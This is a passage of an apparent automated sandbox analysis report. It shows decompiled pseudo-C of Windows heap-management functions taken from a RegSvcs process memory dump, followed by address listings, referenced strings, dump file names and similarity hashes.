									E01071411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E00FD7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E00FD7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x10a8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E00FBB150();
							} else {
								E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E00FBB150();
							__eflags =  *0x10a7bc8;
							if( *0x10a7bc8 == 0) {
								__eflags = 0;
								E01072073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x10a8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E00FBB150();
												} else {
													E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E00FBB150();
												__eflags =  *0x10a7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01072073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0107A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E00FDA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E00FDB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E00FDA830(_t553, _v64, _v24);
								_t286 = E00FD7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E00FD7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01071411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E00FD7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E00FD7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01071411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E00FE174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E00FDB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E00FD7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E010714FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E00FD99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E00FDA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E00FEABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}

0x00fda309
0x00fda316
0x00fda319
0x00fda31d
0x00fda32d
0x00fda331
0x01021e0d
0x01021e10
0x00fda3cb
0x00fda3cb
0x00fda3bd
0x00fda3c3
0x00fda3c3
0x00fda33a
0x01021e17
0x01021e1b
0x01021e1d
0x01021e2f
0x01021e34
0x01021e36
0x01021e3c
0x01021e3c
0x01021e3c
0x01021e3c
0x01021e36
0x01021e42
0x01021e45
0x01021e47
0x00fda3f8
0x00fda3f8
0x00fda3fb
0x00fda3fd
0x01021e50
0x00fda403
0x00fda411
0x00fda411
0x00fda411
0x00fda41e
0x00fda420
0x00fda424
0x00fda427
0x00fda7c9
0x00fda7cd
0x00fda7d2
0x00fda7d9
0x00fda7e0
0x00fda7e3
0x00fda7ed
0x00fda7f3
0x00fda7f9
0x00fda7ff
0x00fda802
0x00fda807
0x00fda809
0x00fda809
0x00fda809
0x00fda80f
0x00fda80f
0x00fda812
0x00fda81c
0x00fda821
0x00fda824
0x00fda42d
0x00fda42d
0x00fda42d
0x00fda42d
0x00fda42d
0x00fda436
0x00fda43a
0x00fda609
0x00fda60d
0x00fda612
0x00fda616
0x00fda61a
0x01021e57
0x01021e59
0x00000000
0x00000000
0x01021e5f
0x00fda620
0x00fda627
0x01021e64
0x01021e66
0x01021e6c
0x01021e72
0x01021e76
0x01021e95
0x01021e9a
0x01021e78
0x01021e8d
0x01021e92
0x01021ea0
0x01021ea5
0x01021eaa
0x01021eb2
0x01021eb6
0x01021eb9
0x01021eb9
0x01021ebe
0x01021ec2
0x01021ec2
0x01021e66
0x00fda62d
0x00fda633
0x00fda636
0x00fda63a
0x00fda63c
0x00fda640
0x00fda642
0x00fda644
0x00fda644
0x00fda644
0x00fda64d
0x00fda64d
0x00fda651
0x00fda655
0x01021eca
0x01021ed1
0x00000000
0x00000000
0x01021ed7
0x00000000
0x00fda65b
0x00fda669
0x00fda66e
0x00fda670
0x00000000
0x00000000
0x00fda676
0x00fda67b
0x00fda680
0x00fda682
0x01021f1a
0x00fda688
0x00fda688
0x00fda688
0x00fda68a
0x00fda68d
0x01021f24
0x01021f2a
0x01021f31
0x01021f43
0x01021f43
0x01021f31
0x00fda693
0x00fda697
0x00fda69d
0x00fda6a0
0x00fda6a6
0x00fda6a8
0x00fda6a8
0x00fda6a8
0x00fda6a8
0x00fda6b2
0x00fda6b7
0x00fda6c1
0x00fda6c6
0x00fda6d2
0x00fda6d9
0x00fda6e3
0x00fda6e6
0x00fda6eb
0x00fda6ed
0x00fda6ed
0x00fda6ed
0x00fda6ed
0x00fda6f3
0x00fda6f8
0x00fda702
0x00fda70a
0x00fda70e
0x00fda71a
0x00fda71e
0x01021fcb
0x01021fcf
0x01021fdd
0x01021fe3
0x01021fe3
0x00fda724
0x00fda728
0x00fda72a
0x00fda72d
0x00fda737
0x00fda73a
0x00fda73c
0x00fda742
0x00fda748
0x01021f4d
0x01021f50
0x01021f56
0x01021f5c
0x01021f5f
0x01021f7e
0x01021f83
0x01021f61
0x01021f76
0x01021f7b
0x01021f89
0x01021f8e
0x01021f93
0x01021f94
0x01021f9a
0x01021f9c
0x01021f9e
0x01021fa1
0x01021fa1
0x01021fa6
0x01021fa6
0x01021f50
0x00fda74e
0x00fda751
0x00fda754
0x00fda75d
0x00fda75e
0x00fda762
0x00fda767
0x01021faf
0x01021fb0
0x01021fb9
0x01021fbe
0x01021fc2
0x01021fc2
0x00fda76d
0x00fda76d
0x00fda775
0x00fda778
0x00fda77d
0x00fda77d
0x00fda71e
0x00fda782
0x00fda787
0x00fda789
0x01021ff3
0x00fda78f
0x00fda78f
0x00fda78f
0x00fda791
0x00fda794
0x01021ffd
0x01022006
0x0102200c
0x01022017
0x01022019
0x01022024
0x01022024
0x01022024
0x01022047
0x01022047
0x0102200c
0x00fda79a
0x00fda79f
0x00fda7a4
0x00fda7a9
0x00fda7ab
0x0102205a
0x00fda7b1
0x00fda7b1
0x00fda7b1
0x00fda7b3
0x00fda7b6
0x00000000
0x00fda7bc
0x01022066
0x01022068
0x01022073
0x01022073
0x01022073
0x01022078
0x01022079
0x0102207d
0x00000000
0x0102207d
0x00fda7b6
0x00fda440
0x00fda440
0x00fda440
0x00fda446
0x00fda44c
0x00fda44f
0x00fda453
0x00fda455
0x010220b3
0x010220b9
0x010220b9
0x00fda45d
0x00fda460
0x00fda464
0x00fda466
0x00fda46b
0x00fda46f
0x00fda471
0x00fda471
0x00fda471
0x00fda474
0x00fda479
0x00fda47d
0x00fda47f
0x01022229
0x0102222f
0x00fda3c8
0x00fda3c8
0x00fda3ca
0x00fda3ca
0x00000000
0x00fda3ca
0x01022235
0x0102223a
0x0102223a
0x00000000
0x00000000
0x01022240
0x01022246
0x0102224a
0x01022269
0x0102226e
0x0102224c
0x01022261
0x01022266
0x01022274
0x01022279
0x0102227e
0x01022286
0x01022288
0x0102228d
0x0102228d
0x01022292
0x01022292
0x01022295
0x01022295
0x00000000
0x01022295
0x00fda485
0x00fda489
0x00fda48b
0x00fda48f
0x00fda493
0x00fda497
0x00fda49b
0x00fda4bb
0x00fda4bb
0x00fda4bd
0x00fda4ff
0x00fda4ff
0x00fda501
0x00fda505
0x00fda50f
0x00fda517
0x00fda51b
0x00fda527
0x00fda52b
0x01022182
0x01022185
0x01022193
0x01022199
0x01022199
0x00fda531
0x00fda535
0x00fda538
0x00fda548
0x00fda54b
0x00fda54d
0x00fda553
0x00fda559
0x01022100
0x01022103
0x01022109
0x0102210f
0x01022112
0x01022131
0x01022136
0x01022114
0x01022129
0x0102212e
0x0102213c
0x01022141
0x01022147
0x0102214d
0x01022151
0x01022154
0x01022154
0x01022159
0x01022159
0x01022103
0x00fda55f
0x00fda562
0x00fda565
0x00fda567
0x01022162
0x00fda56d
0x00fda574
0x00fda575
0x00fda579
0x00fda57e
0x01022169
0x0102216a
0x01022170
0x01022175
0x01022179
0x01022179
0x00fda57e
0x00fda584
0x00fda58f
0x00fda58f
0x00fda52b
0x00fda5ad
0x00fda5bc
0x00fda5c1
0x00fda5c6
0x00fda5cb
0x00fda5cd
0x010221a9
0x00fda5d3
0x00fda5d3
0x00fda5d3
0x00fda5d5
0x00fda5d8
0x010221b3
0x010221bc
0x010221c2
0x010221cd
0x010221cf
0x010221da
0x010221da
0x010221da
0x010221f7
0x010221f7
0x010221c2
0x00fda5de
0x00fda5e3
0x00fda5e8
0x00fda5ea
0x0102220a
0x00fda5f0
0x00fda5f0
0x00fda5f0
0x00fda5f2
0x00fda5f5
0x01022219
0x0102221b
0x0102208c
0x0102208c
0x0102208c
0x01022095
0x01022096
0x01022097
0x01022098
0x010220a4
0x010220a5
0x010220a9
0x010220a9
0x00000000
0x00fda5f5
0x00fda4bf
0x00fda4d3
0x00fda4d8
0x00fda4da
0x01021ede
0x01021ede
0x01021ee4
0x01021ee9
0x00000000
0x00000000
0x01021f07
0x00000000
0x01021f07
0x00fda4e0
0x00fda4e5
0x00fda4e7
0x010220cb
0x00fda4ed
0x00fda4ed
0x00fda4ed
0x00fda4f2
0x00fda4f5
0x010220d5
0x010220de
0x010220e4
0x010220f6
0x010220f6
0x010220e4
0x00fda4fb
0x00000000
0x00fda4fb
0x00fda4a1
0x00fda4a4
0x00fda4a8
0x00000000
0x00000000
0x00fda4aa
0x00fda4ac
0x00000000
0x00000000
0x00fda4b2
0x00fda4b5
0x00000000
0x00000000
0x00000000
0x00fda4b5
0x00fda43a
0x00fda340
0x00fda346
0x00fda600
0x00000000
0x00fda600
0x00fda34f
0x00fda351
0x00fda358
0x00fda3c6
0x00000000
0x00fda371
0x00fda37a
0x00fda37f
0x00fda382
0x00fda384
0x00fda394
0x00000000
0x00fda396
0x00fda399
0x00fda3a7
0x00fda3b0
0x00fda3b4
0x00fda3bb
0x00fda3d2
0x00fda3da
0x00fda3df
0x00fda3e1
0x00fda3e5
0x00fda3ea
0x00fda3f0
0x00fda3f0
0x00fda3e1
0x00000000
0x00fda3bb
0x00fda394

Strings

(UCRBlock != NULL), xrefs: 01021EA0
HEAP: , xrefs: 01021E95, 01021F7E, 01022131, 01022269
(LONG)FreeEntry->Size > 1, xrefs: 0102213C
((LONG)FreeEntry->Size > 1), xrefs: 01021F89
(!TrailingUCR), xrefs: 01022274
HEAP[%wZ]: , xrefs: 01021E88, 01021F71, 01022124, 0102225C

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: f2db9da9e1a4918ee89b2ed171db6c551c5caf271e6747dce66631137d4ce493
Instruction ID: cc9d9b6dc5be257f3bc207091e1668e45db15f4071b67e68de7f1375187e952f
Opcode Fuzzy Hash: f2db9da9e1a4918ee89b2ed171db6c551c5caf271e6747dce66631137d4ce493
Instruction Fuzzy Hash: B642E0316087819FC715DF28C884B6ABBE6FF88704F18496EF4868B352D738D981DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00FDB477 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 405
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E00FDB477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x10ad360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E00FDB8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E00FFB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x10a8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E00FBB150();
						} else {
							E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E00FBB150();
						__eflags =  *0x10a7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E01072073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x10a8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x10ab1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E00FF9730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E0107A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E00FF9660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E0107138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E0106FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E0107A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E0107A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E00FD7D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E01071582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E00FD7D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E01071582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E00FDB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E00FDBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E0107A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}

0x00fdb486
0x00fdb48a
0x00fdb48e
0x00fdb491
0x00fdb493
0x00fdb49a
0x00fdb49c
0x00fdb4a2
0x00fdb4a7
0x00fdb6fc
0x00fdb6fc
0x00fdb6b3
0x00fdb6c3
0x00fdb6c3
0x00fdb4b4
0x0102294f
0x01022951
0x01022957
0x0102295d
0x01022961
0x01022980
0x01022985
0x01022963
0x01022978
0x0102297d
0x0102298b
0x01022990
0x01022995
0x0102299d
0x010229a1
0x010229a2
0x010229a2
0x010229a7
0x010229a7
0x01022951
0x00fdb4ba
0x00fdb4ba
0x00fdb4bd
0x00fdb4c2
0x00fdb6d4
0x00fdb4c8
0x00fdb4c8
0x00fdb4c8
0x00fdb4cd
0x00fdb4d0
0x00fdb4d9
0x00fdb4df
0x00fdb4e2
0x010229b7
0x010229bd
0x00000000
0x00fdb4e8
0x00fdb4e8
0x00fdb4ef
0x00fdb4fa
0x00fdb703
0x00fdb709
0x00fdb70b
0x00fdb711
0x00fdb711
0x00fdb70b
0x00fdb503
0x00fdb50c
0x00fdb511
0x00fdb514
0x00fdb519
0x010229c5
0x010229c7
0x010229cc
0x010229cd
0x010229cf
0x010229d0
0x010229d2
0x010229d7
0x010229d9
0x010229ee
0x010229ee
0x010229f4
0x010229fa
0x01022a01
0x00000000
0x01022a01
0x010229db
0x010229df
0x00000000
0x00000000
0x010229e1
0x010229e4
0x00000000
0x00000000
0x010229e6
